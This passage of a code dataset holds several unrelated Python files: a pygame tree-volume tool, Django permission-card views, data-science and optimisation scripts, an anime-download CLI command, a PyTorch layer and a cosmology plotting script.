1\n\n elif self.keys.get(\"back_space\") and self.part == \"phrase2\": # and not self.program.cooldown\n new_phrase = \"\"\n count = 1\n if self.phrase2 == \"\":\n self.keys[\"back_space\"] = False\n else:\n for e in self.phrase2:\n if count == len(self.phrase2):\n self.keys[\"back_space\"] = False\n self.phrase2 = new_phrase\n # self.program.cooldown = True\n break\n else:\n new_phrase += e\n count += 1\n\n if self.program.settings.info_bar_state:\n self.info.box_top((\"STEP 2\", \"Enter the scale in meters\"))\n self.screen.blit(self.image, (0, 100))\n if self.part == \"phrase1\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1 + \"|\", None), (500, 10), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, 30))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, 10), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, 30))\n self.loop += 1\n elif self.part == \"phrase2\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, 10))\n self.info.custom_message((\"Y : \" + self.phrase2 + \"|\", None), (500, 30), (255, 0, 0))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, 10))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, 30), (255, 0, 0))\n self.loop += 1\n\n\n\n else:\n self.info.box_bottom((\"STEP 2\", \"Enter the scale in meters\"))\n self.screen.blit(self.image, (0, 0))\n if self.part == \"phrase1\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1 + \"|\", None), (500, self.screen.get_height()-90), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, self.screen.get_height()-70))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, self.screen.get_height()-90), (255, 0, 0))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, self.screen.get_height()-70))\n self.loop += 1\n elif self.part == 
\"phrase2\":\n if self.loop < self.max_loop / 2:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, self.screen.get_height()-90))\n self.info.custom_message((\"Y : \" + self.phrase2 + \"|\", None), (500, self.screen.get_height()-70), (255, 0, 0))\n self.loop += 1\n else:\n self.info.custom_message((\"X : \" + self.phrase1, None), (500, self.screen.get_height()-90))\n self.info.custom_message((\"Y : \" + self.phrase2, None), (500, self.screen.get_height()-70), (255, 0, 0))\n self.loop += 1\n\n\n\n\n\n if self.loop == self.max_loop:\n self.loop = 0\n\n self.program.hover.show((mx, my))\n self.screen.blit(self.program.settings.button, (self.program.settings.button_rect.x, self.program.settings.button_rect.y))\n\n\n count = 1\n if self.part == \"phrase1\":\n for point in self.position_list:\n if count == 1:\n self.screen.blit(self.cursor, (point[0] - 25, point[1] - 25))\n elif count == 2:\n self.screen.blit(self.cursor, (self.position_list[1][0] - 25, self.position_list[0][1] - 25))\n count += 1\n else:\n for point in self.position_list:\n if count == 3:\n self.screen.blit(self.cursor, (point[0] - 25, point[1] - 25))\n elif count == 4:\n self.screen.blit(self.cursor, (self.position_list[2][0] - 25, self.position_list[3][1] - 25))\n count += 1\n\n\n\n\n def precise_image(self, mx, my):\n if not self.program.right_click_pressed[1] and self.program.was_pressed:\n if self.program.started:\n self.program.position2x = mx\n self.program.position2y = my\n\n #add in database\n\n self.program.draw_line.register(self.program.position1x, self.program.position2x, self.program.position1y, self.program.position2y)\n self.program.position1x = self.program.position2x\n self.program.position1y = self.program.position2y\n self.program.was_pressed = False\n\n else: # start the program (get the first coordinates)\n self.program.position1x = mx\n self.program.position1y = my\n # define the function as started\n self.program.started = True\n self.program.was_pressed = False\n\n\n if self.program.settings.info_bar_state:\n self.screen.blit(self.image, (0, 100))\n self.info.box_top((\"STEP 3\",\n \"By using your mouse,click around the image to let the computer know were the tree is.\",\n \"When you have finished, press the top right button\"\n ))\n else:\n self.screen.blit(self.image, (0, 0))\n self.info.box_bottom((\"STEP 3\",\n \"By using your mouse,click around the image to let the computer know were the tree is.\",\n \"When you have finished, press the top right button\"\n ))\n\n self.program.hover.show((mx, my))\n self.screen.blit(self.backwards_button, (self.backwards_button_rect.x, self.backwards_button_rect.y))\n self.screen.blit(self.done_button, (self.done_button_rect.x, self.done_button_rect.y),\n special_flags=4) # 3 &nd 4\n\n\n self.screen.blit(self.program.settings.button, (self.program.settings.button_rect.x, self.program.settings.button_rect.y))\n self.program.draw_line.update(self.leaf_lines)\n\n\n\n\n\n\n\n def resize_image(self):\n width = self.image.get_width()\n height = self.image.get_height()\n c_width = GetSystemMetrics(0)\n c_height = GetSystemMetrics(1)\n\n if width < c_width/1.2 or height < c_height/1.2-100:\n while width < c_width/1.2-400 or height < c_height/1.2-500:\n if width * 1.1 < c_width/1.7-200 or height < height * 1.1:\n width *= 1.1\n height *= 1.1\n else:\n width *= 1.05\n height *= 1.05\n\n elif width > c_width/1.2 or height > c_height/1.2-100:\n while width > c_width/1.2-400 or height > c_height/1.2-500:\n width /= 1.1\n height /= 1.1\n\n width = round(width)\n 
height = round(height)\n self.screen_x = width\n self.screen_y = height\n self.image = pygame.transform.scale(self.image, (width, height))\n pygame.display.set_mode((width, height+100))\n\n self.done_button_rect.x = self.screen.get_width()- 100\n self.done_button_rect.y = 0\n\n #here I load images\n self.right_button = pygame.image.load(\"images/right.png\")\n self.right_button = pygame.transform.scale(self.right_button, (100, 100))\n self.right_button_rect = self.right_button.get_rect()\n self.right_button_rect.x = self.image.get_width()-self.right_button.get_width()\n self.right_button_rect.y = 0\n\n self.transparent_green = pygame.image.load(\"images/transparent.png\")\n self.transparent_green = pygame.transform.scale(self.transparent_green,(self.screen.get_width(), self.screen.get_height()))\n self.transparent_green_rect = self.transparent_green.get_rect()\n\n self.final_message_box = pygame.image.load(\"images/message_box4.png\")\n self.final_message_box = pygame.transform.scale(self.final_message_box, (round(self.final_message_box.get_width() / 1.75), round(self.final_message_box.get_height() / 1.75)))\n self.final_message_box_rect = self.final_message_box.get_rect()\n self.final_message_box_rect.x = (self.screen.get_width() - self.final_message_box.get_width()) / 2\n self.final_message_box_rect.y = (self.screen.get_height() - self.final_message_box.get_height()) / 2.5\n\n self.save_button = pygame.image.load(\"images/save.png\")\n self.save_button = pygame.transform.scale(self.save_button, (round(self.save_button.get_width() / 2), round(self.save_button.get_height() / 2)))\n self.save_button_rect = self.save_button.get_rect()\n self.save_button_rect.x = round((self.screen.get_width() - self.save_button.get_width()) / 2)\n\n e = (self.final_message_box_rect.y + self.final_message_box.get_height() + self.save_button.get_height())\n self.save_button_rect.y = round(self.final_message_box_rect.y + self.final_message_box.get_height() + (self.screen.get_height() - e) / 2)\n\n\n\n def get_parameters(self, mx, my):\n if not self.program.right_click_pressed[1] and self.program.was_pressed:\n self.position_list.append([mx, my])\n self.program.was_pressed = False\n\n\n\n","repo_name":"game-geek/treevolumecalculator","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":15691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
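resize_image above approaches the target size by repeated multiplication and division by 1.1. A single-step alternative that preserves the aspect ratio exactly (a sketch under the same pygame assumptions, not the project's code):

```python
import pygame

def fit_surface(image, max_w, max_h):
    """Scale a pygame surface to fit inside (max_w, max_h) without distortion."""
    w, h = image.get_size()
    scale = min(max_w / w, max_h / h)
    return pygame.transform.scale(image, (round(w * scale), round(h * scale)))
```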
+{"seq_id":"2302367502","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import permissioncard_form\nfrom .models import permissioncard\nfrom account.models import User\nfrom datetime import datetime\n\n# Create your views here.\n\n@login_required(login_url='/home/login')\ndef permissioncardpage(request):\n if request.session['is_DOD'] or request.session['is_abla'] or request.session['is_security']:\n card_data=permissioncard.objects.all()\n else:\n user = User.objects.get(username = request.session['username'])\n card_data=permissioncard.objects.filter(name=user.name, Class=user.Class)\n response={'permissioncard': card_data}\n return render(request, 'permissioncardpage.html', response)\n\ndef form_permissioncard(request):\n form = permissioncard_form(request.POST or None)\n\n if(request.method == 'POST' and form.is_valid()) :\n form_data = form.save(commit=False)\n id = \"PC\" + str(permissioncard.objects.all().count() + 1)\n form_data.id = id\n user = User.objects.get(username = request.session['username'])\n form_data.name = user.name\n form_data.Class = user.Class\n form_data.save()\n\n response = {'form' : form}\n return render(request, 'permissioncardform.html', response)\n\ndef dod_approval(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_dod = \"Approved\"\n data.save(update_fields=['approval_dod'])\n return redirect(\"/\")\n\ndef dod_reject(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_dod = \"Not approved\"\n data.save(update_fields=['approval_dod'])\n return redirect(\"/\")\n\ndef security_depart(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_security_start = datetime.now()\n data.save(update_fields=['approval_security_start'])\n return redirect(\"/\")\n\ndef security_arrive(request, id):\n data = permissioncard.objects.get(id=id)\n data.approval_security_finish = datetime.now()\n data.save(update_fields=['approval_security_finish'])\n return redirect(\"/\")","repo_name":"sopigoo/ODLES","sub_path":"permissioncard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26330792574","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 9 17:39:40 2022\r\n\r\n@author: Sai pranay\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nmm = pd.read_csv(\"E:\\DATA_SCIENCE_ASS\\ASSOCIATION RULES\\\\my_movies.csv\")\r\nprint(mm)\r\nmm.shape\r\nlist(mm)\r\nmm.describe()\r\nmm.info()\r\n\r\n\r\nmm1 = mm.drop(['V1','V2','V3','V4','V5'],axis = 1)\r\nmm1\r\n\r\n#---------------------checking_for_null_values---------------------------------\r\n\r\nmm1.isnull().sum()\r\n\r\n#-----------------------GETTIG_DUMMY_VALUE-------------------------------------\r\n\r\nm_m=pd.get_dummies(mm1)\r\nprint(m_m)\r\nm_m.shape\r\nm_m.info()\r\n\r\n\r\nfrom mlxtend.frequent_patterns import apriori,association_rules\r\nfrom mlxtend.preprocessing import TransactionEncoder\r\n\r\n\r\n#---------------------------Apriori Algorithm----------------------------------\r\nproduct = apriori(m_m, min_support=0.1, use_colnames=True)\r\nprint(product)\r\n\r\n\r\nrule = association_rules(product, metric=\"lift\", min_threshold=0.7)\r\nrule\r\n\r\n\r\nrule.sort_values('lift',ascending = False)\r\n\r\nrule.sort_values('lift',ascending = False)[0:20]\r\n\r\nrule[rule.lift>1]\r\n\r\nrule[['support','confidence']].hist()\r\n\r\nrule[['support','confidence','lift']].hist()\r\n\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.scatter(rule['support'], rule['confidence'])\r\nplt.show()\r\n\r\n\r\nimport seaborn as sns\r\nsns.scatterplot('support', 'confidence', data=rule, hue='antecedents')\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Saipranay009/ASSOCIATION-RULES","sub_path":"untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4318697422","text":"# Common database of hostnames, IPs, and MAC addresses for DHCP, DNS,\n# and other tools.\n\nDEFAULT_DOMAIN = '__DOMAIN__'\nLOC_NETWORK = '__LOC_NETWORK__'\nLOC_NETWORK_PREFIX = '__LOC_NETWORK_PREFIX__'\nLOC_NETMASK_SHORT = '__LOC_NETMASK_SHORT__'\nDMZ_NETWORK = '__DMZ_NETWORK__'\nDMZ_NETWORK_PREFIX = '__DMZ_NETWORK_PREFIX__'\nDMZ_NETMASK_SHORT = '__DMZ_NETMASK_SHORT__'\n\nSYSTEM_DATABASE_LOC = [\n { 'host': '__HOSTNAME__',\n 'mac': '__ETH1_MAC__',\n 'ip': '__ETH1_IP__',\n },\n ]\n\nSYSTEM_DATABASE_DMZ = [\n { 'host': '__HOSTNAME__-dmz',\n 'mac': '__ETH2_MAC__',\n 'ip': '__ETH2_IP__',\n 'aliases': ('ns1',),\n },\n ]\n","repo_name":"mikerenfro/firewall-bootstrap","sub_path":"system_database.py","file_name":"system_database.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"17714768152","text":"# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n#\tBy Javier León Palomares, University of Granada, 2018 #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nfrom NSGA_II_Feature_SelectionSVM import *\nimport numpy as np\nimport time\nimport multiprocessing\n\nif __name__ == '__main__':\n\n\tdata = {'train': np.load(\"../data/data_training_104.npy\"),\n\t\t\t'test': np.load(\"../data/data_test_104.npy\")}\n\n\tlabels = {'train': np.load(\"../data/labels_training_104.npy\"),\n\t\t\t 'test': np.load(\"../data/labels_test_104.npy\")}\n\n\tcores = [x for x in range(2,multiprocessing.cpu_count()+1)]\n\n\tstart_sequential = time.time()\n\n\tpopulation, sort_scores, evaluation = \\\n\t\tFeatureSelection(data=data,labels=labels,max_features=50,\n\t\t\tobjective_funcs=[KappaLoss,CrossValidationLoss],\n\t\t\tpop_size=100,generations=50,seed=29,crossover_prob=0.9,\n\t\t\tcrossover_func=UniformCrossover,mutation_prob=1.0,\n\t\t\tmutation_func=FlipBitsMutation,pool_fraction=0.5,\n\t\t\tn_cores=1,show_metrics=False)\n\n\tprint(\"Sequential:\")\n\tprint(time.time() - start_sequential)\n\tprint(\"Parallel:\")\n\n\tfor n_core in cores:\n\n\t\tstart_parallel = time.time()\n\n\t\tpopulation, sort_scores, evaluation = \\\n\t\t\tFeatureSelection(data=data,labels=labels,max_features=50,\n\t\t\t\tobjective_funcs=[KappaLoss,CrossValidationLoss],\n\t\t\t\tpop_size=100,generations=50,seed=29,crossover_prob=0.9,\n\t\t\t\tcrossover_func=UniformCrossover,mutation_prob=1.0,\n\t\t\t\tmutation_func=FlipBitsMutation,pool_fraction=0.5,\n\t\t\t\tn_cores=n_core,show_metrics=False)\n\n\t\tprint(\"%d %f\" % (n_core,time.time() - start_parallel))\n","repo_name":"jleon95/UGR_TFG","sub_path":"src/FS_SequentialvsParallel.py","file_name":"FS_SequentialvsParallel.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"74320562786","text":"import sys\n\n#deque의 rotate함수로 쉽게 회전하기 위해 import\nfrom collections import deque\ninput=sys.stdin.readline\n\n#왼쪽 부분 회전\ndef left_rotate(idx,d):\n #같은 극이거나 왼쪽 범위를 초과할 경우 return\n if idx<0 or command[idx]==0:\n return\n wheel[idx].rotate(-d)\n left_rotate(idx-1,-d)\n \ndef right_rotate(idx,d):\n #같은극이거나 오른쪽 범위를 초과할 경우 return\n if idx>3 or command[idx-1]==0:\n return\n wheel[idx].rotate(-d)\n right_rotate(idx+1,-d)\n\n#현재 마주하는 극의 상태를 저장\ndef is_rotate():\n command.clear()\n if wheel[0][2]!=wheel[1][6]:\n command.append(1)\n else:\n command.append(0)\n if wheel[1][2]!=wheel[2][6]:\n command.append(1)\n else:\n command.append(0)\n if wheel[2][2]!=wheel[3][6]:\n command.append(1)\n else:\n command.append(0)\n\n#deque를 담을 wheel 선언\nwheel={}\nfor i in range(4):\n wheel[i]=deque(list(map(int,input().strip())))\n \nk=int(input())\n\ncommand=[]\n\nfor _ in range(k):\n a,b=map(int,input().split())\n is_rotate()\n left_rotate(a-2,b)\n right_rotate(a,b)\n #자기자신도 회전\n wheel[a-1].rotate(b)\nans=0\ntemp=0\n\n#12시방향에 따라서 점수 올림 (2의 n승)\nfor i in range(4):\n if wheel[i][0]==1:\n ans+=2**temp\n temp+=1\n \nprint(ans)\n","repo_name":"JJONGHYUNI/algorithm","sub_path":"2022/bakjoon/python/implementation/14891.py","file_name":"14891.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20509188648","text":"\"\"\"Setup script for the DEODR project.\"\"\"\n\nimport os\nimport re\nfrom setuptools import setup, find_packages\n\nfrom Cython.Build import cythonize\n\nimport numpy as np\n\n\n# compilation mode for debuging\n# extensions = [\n# Extension(\"differentiable_renderer_cython\",\n# [\"DEODR/differentiable_renderer_cython.pyx\"]\n# ,extra_compile_args=[\"-Zi\", \"/Od\"]\n# ,extra_link_args=[\"-debug\"],\n# undef_macros = [ \"NDEBUG\" ]\n# )\n# ]\n\nextensions = \"deodr/differentiable_renderer_cython.pyx\"\n\nmy_modules = cythonize(extensions, annotate=True, language=\"c++\")\n\nlibname = \"deodr\"\n\nwith open(os.path.join(os.path.dirname(__file__), \"deodr\", \"__init__.py\")) as fp:\n for line in fp:\n m = re.search(r'^\\s*__version__\\s*=\\s*([\\'\"])([^\\'\"]+)\\1\\s*$', line)\n if m:\n version = m.group(2)\n break\n else:\n raise RuntimeError(\"Unable to find own __version__ string\")\nprint(f\"version = {version}\")\nsetup(\n name=libname,\n version=version,\n author=\"Martin de La Gorce\",\n author_email=\"martin.delagorce@gmail.com\",\n description=\"A differentiable renderer with Pytorch,Tensorflow and Matlab interfaces.\",\n url=\"https://github.com/martinResearch/DEODR\",\n license=\"BSD\",\n packages=find_packages(),\n package_data={\"deodr\": [\"*.pyx\", \"*.pxd\", \"data/*.*\", \"data/**/*.*\"]},\n data_files=[(\"C++\", [\"C++/DifferentiableRenderer.h\"])],\n ext_modules=my_modules, # additional source file(s)),\n include_dirs=[np.get_include()],\n setup_requires=[\"numpy\", \"scipy\", \"cython\"],\n install_requires=[\"numpy\", \"scipy\"],\n)\n","repo_name":"jasvob/DEODR","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"6503569154","text":"import logging\nimport os\nfrom pathlib import Path\n\nimport click\nimport requests\nfrom tqdm import tqdm\n\nfrom ...codebase import (Associator, aed, get_filler_list, hls_download,\n sanitize_filename, url_download)\nfrom ...config import QUALITY, SESSION_FILE\nfrom ..helpers import *\n\n\n@click.command(name='download', help=\"Download your favorite anime by query.\")\n@click.argument('query', required=True)\n@click.option('-a', '--anonymous', is_flag=True, default=False,\n help='Avoid writing session files for this session.')\n@click.option('-s',\n '--start',\n help=\"An integer that determines where to begin the downloading from.\",\n required=False,\n default=0,\n show_default=False,\n type=int)\n@click.option('-e',\n '--end',\n help=\"A integer that determines where to end the downloading at.\",\n required=False,\n default=0,\n show_default=False,\n type=int)\n@click.option('-q',\n '--quality',\n help='Select a preferred quality if available.',\n required=False,\n default=QUALITY,\n type=int)\n@click.option('-t',\n '--title',\n help=\"Optional title for the anime if the query is a direct URL. This will be used as the download folder name.\",\n required=False,\n default='',\n show_default=False)\n@click.option('-fl',\n '--filler-list',\n help=\"Filler list associated with the content enqueued for the download.\",\n required=False,\n default='',\n show_default=False)\n@click.option('-o',\n '--offset',\n help=\"Offset (If the E1 of your anime is marked as E27 on AnimeFillerList, this value should be 26).\",\n required=False,\n default=0,\n show_default=False)\n@click.option('--filler', is_flag=True, default=True,\n help=\"Auto-skip fillers (If filler list is configured).\")\n@click.option('--mixed', is_flag=True, default=True,\n help=\"Auto-skip mixed fillers/canons (If filler list is configured).\")\n@click.option('--canon', is_flag=True, default=True,\n help=\"Auto-skip canons (If filler list is configured).\")\n@click.option('--idm', is_flag=True, default=False,\n help=\"Download anime using Internet Download Manager\")\n@click.option('--auto', is_flag=True, default=False,\n help=\"Select the first given index without asking for prompts.\")\n@click.option('-i', '--index', required=False, default=0,\n show_default=False, type=int, help=\"Index for the auto flag.\")\n@click.option('-ll',\n '--log-level',\n help='Set the integer log level.',\n type=int,\n default=20)\n@bannerify\ndef animdl_download(\n query,\n anonymous,\n start,\n end,\n quality,\n title,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n idm,\n auto,\n index,\n log_level):\n \"\"\"\n Download call.\n \"\"\"\n print(query,\n anonymous,\n start,\n end,\n quality,\n title,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n idm,\n auto,\n index,\n log_level)\n end = end or float('inf')\n\n session = requests.Session()\n\n anime, provider = process_query(\n session, query, auto=auto, auto_index=index)\n if not anime:\n return\n logger = logging.getLogger('animdl-%s-downloader-core' % provider)\n content_name = title or anime.get('name')\n if not content_name:\n content_name = choice(create_random_titles())\n logger.warn(\n \"Could not get the folder to download to, generating a cool random folder name: %s\" %\n content_name)\n logger.info(\n \"Initializing download session [%02d -> %s]\" %\n (start, '%02d' %\n end if isinstance(\n end, int) else '?'))\n url = anime.get('anime_url')\n anime_associator = Associator(url, session=session)\n check = lambda *args, **kwargs: True\n 
raw_episodes = []\n\n if filler_list:\n raw_episodes = get_filler_list(session, filler_list, fillers=True)\n logger.info(\n \"Succesfully loaded the filler list from '%s'.\" %\n filler_list)\n start += offset\n if not isinstance(end, int):\n end = len(raw_episodes)\n check = (lambda x: raw_episodes[offset +\n x -\n 1].content_type in ((['Filler'] if filler else []) +\n (['Mixed Canon/Filler'] if mixed else []) +\n (['Anime Canon', 'Manga Canon'] if canon else [])))\n\n if not anonymous:\n sessions.save_session(\n SESSION_FILE,\n url,\n start,\n content_name,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n t='download',\n end=end)\n\n base = Path('./%s/' % sanitize_filename(content_name.strip()))\n base.mkdir(exist_ok=True)\n\n streams = [\n *\n anime_associator.raw_fetch_using_check(\n lambda x: check(x) and end >= x >= start)]\n end_str = '%02d' % end if isinstance(end, int) else (\n start + len(streams) - 1) if not raw_episodes else len(raw_episodes)\n logger.info(\"Starting download session [%02d -> %s]\" % (start, end_str))\n logger.info(\"Downloads will be done in the folder '%s'\" % content_name)\n\n for stream_url_caller, c in streams:\n stream_urls = stream_url_caller()\n\n if not anonymous:\n sessions.save_session(\n SESSION_FILE,\n url,\n c,\n content_name,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n t='download',\n end=end,\n idm=idm)\n\n content_title = \"E%02d\" % c\n if raw_episodes:\n content_title += \" - %s\" % raw_episodes[c - 1].title.strip()\n\n if not stream_urls:\n logger.error(\n \"Failed to download '%s' due to lack of stream urls.\" %\n content_title)\n continue\n\n available_qualities = [*filter_quality(stream_urls, quality)]\n if not available_qualities:\n content = stream_urls[0]\n q = content.get('quality')\n if q not in ['multi']:\n logger.warn(\"Can't find the quality '{}' for {!r}; falling back to {}.\".format(\n quality, content_title, q if q != 'unknown' else 'an unknown quality'))\n else:\n content = available_qualities.pop(0)\n\n q = content.get('quality')\n\n if q not in ['unknown', 'multi'] and int(q or 0) != quality:\n logger.warn(\n \"Fell back to quality '{}' due to unavailability of '{}'.\".format(\n q, quality))\n\n extension = aed(content.get('stream_url'))\n if extension in ['php', 'html']:\n extension = 'mp4'\n file_path = Path(\n '%s.%s' %\n (sanitize_filename(content_title),\n extension or 'mp4'))\n download_path = base / file_path\n\n if extension in ['m3u', 'm3u8']:\n hls_download(stream_urls,\n base / (\"%s.ts\" % sanitize_filename(content_title)),\n content_title,\n preferred_quality=quality)\n continue\n\n if idm:\n from ...codebase.downloader import idmanlib\n if idmanlib.supported():\n if download_path.exists():\n download_path.chmod(0x1ff)\n os.remove(download_path.as_posix())\n logger.info(\n \"Downloading with Internet Download Manager [%02d/%s]\" %\n (c, end_str))\n idmanlib.wait_until_download(content.get('stream_url'), headers=content.get(\n 'headers', {}), filename=file_path, download_folder=base.absolute())\n continue\n\n url_download(\n content.get('stream_url'),\n download_path,\n lambda r: tqdm(\n desc=content_title,\n total=r,\n unit='B',\n unit_scale=True,\n unit_divisor=1024),\n content.get(\n 'headers',\n {}))\n","repo_name":"ajitjs1995/Anime_Down","sub_path":"core/cli/commands/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":8791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
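url_download above receives a stream URL, a path, a tqdm factory, and headers, but its body is not shown in this record. A plausible shape for such a helper, offered purely as an assumption rather than the project's actual code:

```python
import requests
from tqdm import tqdm

def url_download_sketch(url, path, headers=None, chunk=1 << 16):
    with requests.get(url, stream=True, headers=headers or {}) as r:
        total = int(r.headers.get('content-length', 0))
        with open(path, 'wb') as f, tqdm(total=total, unit='B', unit_scale=True,
                                         unit_divisor=1024) as bar:
            for part in r.iter_content(chunk_size=chunk):
                f.write(part)
                bar.update(len(part))
```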
+{"seq_id":"42605800982","text":"import torch\nfrom torch import nn\n\n\nclass MoGLayer(nn.Module):\n\n def __init__(self, noise_dim: tuple):\n \"\"\"\n\n :param noise_dim: The noise dimension\n \"\"\"\n super(MoGLayer, self).__init__()\n\n pre_std = torch.zeros(noise_dim)\n pre_std = torch.nn.init.uniform_(pre_std, -0.2, 0.2)\n self.std = nn.Parameter(pre_std, requires_grad=True)\n\n pre_mean = torch.zeros(noise_dim)\n pre_mean = torch.nn.init.uniform_(pre_mean, -1.0, 1.0)\n self.mean = nn.Parameter(pre_mean, requires_grad=True)\n\n def to(self, *args):\n \"\"\"\n Just override a bit to move the parameters\n :param args: Expected to be a device name\n :return: Nothing\n \"\"\"\n super(MoGLayer, self).to(args[0])\n self.mean = self.mean.to(args[0])\n self.std = self.std.to(args[0])\n\n def forward(self, noise):\n return self.mean + (self.std * noise)\n","repo_name":"nopphonyel/WWGAN","sub_path":"model/semi_supervised/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7056003692","text":"from chessboard import chessboard\nfrom choose import choose\nclass game(object):\n\tglobal row,col,chessboard,choose\n\tdef b(self):\n\t\tprint(\"Rows and Columns\")\n\t\tself.row=input()\n\t\tself.col=input()\n\t\tself.chessboard=chessboard(self.row,self.col)\n\tdef input(self):\n\t\tboard=self.chessboard\n\t\trow=self.row\n\t\tcol=self.col\n\t\tself.choose=choose()\n\t\tprint(\"Player A Input\")\n\t\tfor x in range(col):\n\t\t\tp=input()\n\t\t\tself.choose.input(row-1,x,p,board,\"A\")\n\t\tprint(\"Player B Input\")\n\t\tfor x in range(col):\n\t\t\tp=input()\n\t\t\tself.choose.input(0,x,p,board,\"B\")\n\tdef start(self):\n\t\twhile(True):\n\t\t\tprint(\"Player A,Your Move\")\n\t\t\tp=input()\n\t\t\tself.choose.move(\"A\",self.chessboard,p)\n\t\t\tprint(\"Player B,Your Move\")\n\t\t\tp=input()\n\t\t\tself.choose.move(\"B\",self.chessboard,p)","repo_name":"hemant1996/chesss","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24702158816","text":"#!/usr/bin/env python3\n\"\"\"A script for reading and plotting snapshots from cosmo_sim_1d\"\"\"\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom functions import smoothing, spectral_calc, SPT_real_tr, read_density\nfrom scipy.interpolate import interp1d\nfrom zel import initial_density\nos.environ[\"HDF5_USE_FILE_LOCKING\"] = \"FALSE\"\n\n# path = 'cosmo_sim_1d/phase_full_run1/'\n# path = 'cosmo_sim_1d/sim_k_1 (copy)/run1/'\npath = 'cosmo_sim_1d/sim_k_1_11/run6/'\n# path = 'cosmo_sim_1d/amps_sim_k_1_11/run1/'\n\n\nmoments_filename = 'output_hierarchy_{0:04d}.txt'.format(0)\nmoments_file = np.genfromtxt(path + moments_filename)\na0 = moments_file[:,-1][0]\nLambda = 3 * (2*np.pi)\nkind = 'sharp'\nsm = True\nfor j in range(1):\n j = 23\n nbody_filename = 'output_{0:04d}.txt'.format(j)\n nbody_file = np.genfromtxt(path + nbody_filename)\n x_nbody = nbody_file[:,-1]\n v_nbody = nbody_file[:,2]\n print(x_nbody.size)\n moments_filename = 'output_hierarchy_{0:04d}.txt'.format(j)\n moments_file = np.genfromtxt(path + moments_filename)\n a = moments_file[:,-1][0]\n print(a)\n x = moments_file[:,0]\n L = 1.0#np.max(x)\n k = np.fft.ifftshift(2.0 * np.pi * np.arange(-x.size/2, x.size/2))\n if sm == True:\n M0 = smoothing(moments_file[:,2], k, Lambda, kind) #with the -1, this is \\delta\n C0 = smoothing(moments_file[:,3], k, Lambda, kind) #with the -1, this is \\delta\n M1 = smoothing(moments_file[:,4], k, Lambda, kind) #with the -1, this is \\delta\n C1 = smoothing(moments_file[:,5], k, Lambda, kind) #with the -1, this is \\delta\n M2 = smoothing(moments_file[:,6], k, Lambda, kind) #with the -1, this is \\delta\n C2 = smoothing(moments_file[:,7], k, Lambda, kind) #with the -1, this is \\delta\n M3 = smoothing(moments_file[:,8], k, Lambda, kind) #with the -1, this is \\delta\n C3 = smoothing(moments_file[:,9], k, Lambda, kind) #with the -1, this is \\delta\n M4 = smoothing(moments_file[:,10], k, Lambda, kind) #with the -1, this is \\delta\n C4 = smoothing(moments_file[:,11], k, Lambda, kind) #with the -1, this is \\delta\n M5 = smoothing(moments_file[:,12], k, Lambda, kind) #with the -1, this is \\delta\n C5 = smoothing(moments_file[:,13], k, Lambda, kind) #with the -1, this is \\delta\n else:\n M0 = moments_file[:,2]\n C0 = moments_file[:,3]\n M1 = moments_file[:,4]\n C1 = moments_file[:,5]\n M2 = moments_file[:,6]\n C2 = moments_file[:,7]\n M3 = moments_file[:,8]\n C3 = moments_file[:,9]\n M4 = moments_file[:,10]\n C4 = moments_file[:,11]\n M5 = 